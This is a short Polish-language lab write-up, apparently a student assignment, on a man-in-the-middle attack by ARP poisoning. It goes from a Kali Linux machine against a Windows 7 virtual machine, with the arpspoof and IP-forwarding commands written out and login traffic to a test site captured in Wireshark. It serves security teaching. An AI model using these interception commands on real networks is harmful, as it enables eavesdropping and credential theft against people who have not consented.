Zadanie 7 -  MITM przez ARP poisoning
Środowisko: Kali Linux
Ofiara - Windows7
1. polecenie arpspoof:
arpspoof -i eth0 -t 10.0.2.5 -r 10.0.2.1 (-t cel ataku, -r adres bramy)

2. polecenie do przekazywania pakietow:
sysctl -w net.ipv4.ip_forward=1

Mozemy zauwazyc, ze tablica ARP zostaa zmieniona
[VirtualBox_IE8_-_Win7_06_11_2022_10_51_40.png](images/VirtualBox_IE8_-_Win7_06_11_2022_10_51_40.png)

Dzialanie arpspoof:
[zad_7_arp_forward.png](images/zad_7_arp_forward.png)

Potwierdzenie zmiany MAC adresu bramy na MAC adres maszyny Kali
[screenshot_ifconfig_zad7.png](images/screenshot_ifconfig_zad7.png)

Dzialanie arpspoof uchwycone w Wireshark
[screenshot_wireshark_zad7.png](images/screenshot_wireshark_zad7.png)

Logowanie na stronie: http://testphp.vulnweb.com/login.php

Przechwycenie ruchu przez Wireshark
[screenshot_wireshark_przechwycenie_zad7.png](images/screenshot_wireshark_przechwycenie_zad7.png)

Plik przechwyconego ruchu z Wireshark
[zad_7.pcap](zad_7.pcap)

